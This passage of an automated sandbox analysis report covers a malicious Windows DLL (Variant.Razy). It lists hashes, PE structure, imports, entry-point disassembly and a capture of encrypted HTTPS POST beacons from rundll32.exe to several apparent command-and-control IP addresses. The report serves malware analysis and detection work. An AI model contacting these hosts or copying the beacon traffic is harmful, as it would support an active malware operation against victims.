                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28360.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.19796.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9816.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.17887.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                      Category:dropped
                                                                                                      Size (bytes):61157
                                                                                                      Entropy (8bit):7.995991509218449
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                      MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                      SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                      SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                      SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):326
                                                                                                      Entropy (8bit):3.108423439276625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kKndFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:V2kPlE99SNxAhUefit
                                                                                                      MD5:AE3BC017C2DD54A4CAAA40D23358A059
                                                                                                      SHA1:5273DD9ABD84A47BBAE7FF7009B12673701ED2A4
                                                                                                      SHA-256:7496F6F5D8214082702B3CD694BB74A6082F4EF45CE1A7AA3FF79141C5066E9A
                                                                                                      SHA-512:353DA18B0586237F8EF7168EF9856368B8385F8C30E984201848E091CEC439EFF01680E3BA8E68FDB0990A4163568068F6ED84095D2E66FEDB1312E115527976
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: p...... ................(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.439722238188894
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:SecuriteInfo.com.Variant.Razy.980776.30568.dll
                                                                                                      File size:1375232
                                                                                                      MD5:968040cc79b202e81fab7ae4ccb311dd
                                                                                                      SHA1:bc63b3f96eb0b71802904fe09c9df7ddc0173c27
                                                                                                      SHA256:8cd503096b975fcfba8ef561945b66b33beaf674b64c3b7b724be9d6bc55ccdb
                                                                                                      SHA512:3a226dc26f384350fed2b53d5c8267c9e32a0fdd097a230719cd6e1861a54eda31c8c92c7af238dd3cd63b1f1664f30b76c0024747d8eb529f9273f43919840b
                                                                                                      SSDEEP:24576:6nxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7z:6cfk82uAJTI7vPswKwuW
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.#.J.p.J.p.J.pa..p.J.p.2zp.J.p.".q.J.p.".q.J.p.".q.J.p.".q.J.pa..p.J.p.J.p.K.p.".q^J.p.".q.J.p.".p.J.p.".q.J.pRich.J.p.......

                                                                                                      File Icon

                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4336b0
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x5BBD8CD7 [Wed Oct 10 05:23:35 2018 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                                      jne 00007F5F0CBE4167h
                                                                                                      call 00007F5F0CBE4E97h
                                                                                                      mov eax, dword ptr [ebp+10h]
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      push ecx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      push edx
                                                                                                      call 00007F5F0CBE3F56h
                                                                                                      add esp, 0Ch
                                                                                                      pop ebp
                                                                                                      retn 000Ch
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      push edx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      xor edx, dword ptr [0054806Ch]
                                                                                                      push edx
                                                                                                      call 00007F5F0CBE41A4h
                                                                                                      add esp, 08h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      mov eax, 00000020h
                                                                                                      sub eax, edx
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+08h]
                                                                                                      push ecx
                                                                                                      call 00007F5F0CBE4173h
                                                                                                      add esp, 08h
                                                                                                      xor eax, dword ptr [0054806Ch]
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      ror eax, cl
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      call 00007F5F0CBE54FDh
                                                                                                      push eax
                                                                                                      call 00007F5F0CC26207h
                                                                                                      add esp, 04h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 18h
                                                                                                      mov eax, dword ptr [ebp+00h]

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xc5e2f0xc6000False0.442065922901data6.47813008534IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xc70000x80aec0x80c00False0.534105734223data5.52055413545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      Bluewing10x49eed0
                                                                                                      Earth20x49efd0
                                                                                                      Masterjust30x49eb20

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 28, 2021 04:54:11.071286917 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:11.071348906 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:11.071439981 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:11.100363970 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:11.100419044 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:11.605257988 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:11.605408907 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:11.876962900 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:11.877021074 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:11.877407074 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:11.877482891 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:11.890834093 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:11.890913963 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:11.891046047 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:12.583472967 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:12.583653927 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:12.583693027 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:12.583734989 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:12.591023922 CEST49713443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:12.591073990 CEST44349713192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:12.759089947 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:12.926362991 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:12.926460981 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:12.927181005 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:13.094001055 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:13.096164942 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:13.096265078 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:13.902035952 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:13.902087927 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:13.902473927 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:13.941143990 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:13.941191912 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:14.465919971 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:14.466175079 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:14.696227074 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:14.696260929 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:14.696929932 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:14.697010040 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:14.699449062 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:14.699561119 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:14.699600935 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:15.404481888 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:15.404584885 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:15.404659033 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:15.404694080 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:15.444636106 CEST49719443192.168.2.7192.46.210.220
                                                                                                      Oct 28, 2021 04:54:15.444679022 CEST44349719192.46.210.220192.168.2.7
                                                                                                      Oct 28, 2021 04:54:15.598447084 CEST49721808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:15.758724928 CEST80849721143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:15.758893967 CEST49721808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:15.760478973 CEST49721808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:15.920685053 CEST80849721143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:15.922388077 CEST80849721143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:15.922514915 CEST49721808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:19.232660055 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:19.399739981 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.400046110 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.400110960 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:19.401171923 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:19.401401997 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:19.568028927 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.568057060 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.568093061 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.568129063 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.568171024 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.954088926 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.954119921 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:19.954204082 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:19.954215050 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:19.961886883 CEST49716808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:20.128730059 CEST80849716143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:20.166405916 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:20.331701040 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:20.331820011 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:20.332602978 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:20.497773886 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:20.498955965 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:20.499094009 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:20.506247044 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:20.671786070 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:20.671946049 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:20.673022032 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:20.673120022 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:20.838376045 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:20.838397026 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:21.217366934 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:21.217396975 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:21.217463017 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:21.225081921 CEST497246891192.168.2.745.77.0.96
                                                                                                      Oct 28, 2021 04:54:21.313879013 CEST49721808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:21.357717037 CEST497278116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:54:21.391448975 CEST68914972445.77.0.96192.168.2.7
                                                                                                      Oct 28, 2021 04:54:21.417536974 CEST811649727185.56.219.47192.168.2.7
                                                                                                      Oct 28, 2021 04:54:21.417771101 CEST497278116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:54:21.418416977 CEST497278116192.168.2.7185.56.219.47
                                                                                                      Oct 28, 2021 04:54:21.474000931 CEST80849721143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:21.474433899 CEST80849721143.244.140.214192.168.2.7
                                                                                                      Oct 28, 2021 04:54:21.474539995 CEST49721808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:21.475240946 CEST49721808192.168.2.7143.244.140.214
                                                                                                      Oct 28, 2021 04:54:21.475347042 CEST49721808192.168.2.7143.244.140.214

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 192.46.210.220

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.749713192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:11 UTC0OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:11 UTC0OUTData Raw: 7c ae 4f 6a 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: |Oj$RYhJ"A@H7;C"kKL!*$hUB0Y4k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:12 UTC4INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:12 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.749719192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:14 UTC5OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:14 UTC5OUTData Raw: 8f ee 2d 65 10 08 24 a2 52 b7 59 a3 1f 68 4a 9d e8 a3 22 fe fb f9 ff 41 00 40 83 cd 88 01 c3 48 f3 f2 eb 37 3b 07 de be c4 ad f0 ba d6 43 99 da ae b3 22 6b 93 0a 4b 4c 0a 21 8f 08 2a 11 24 f4 68 a9 c7 55 42 f2 30 92 59 b3 8f 34 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: -e$RYhJ"A@H7;C"kKL!*$hUB0Y4kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:15 UTC9INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:15 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.749775192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:40 UTC49OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
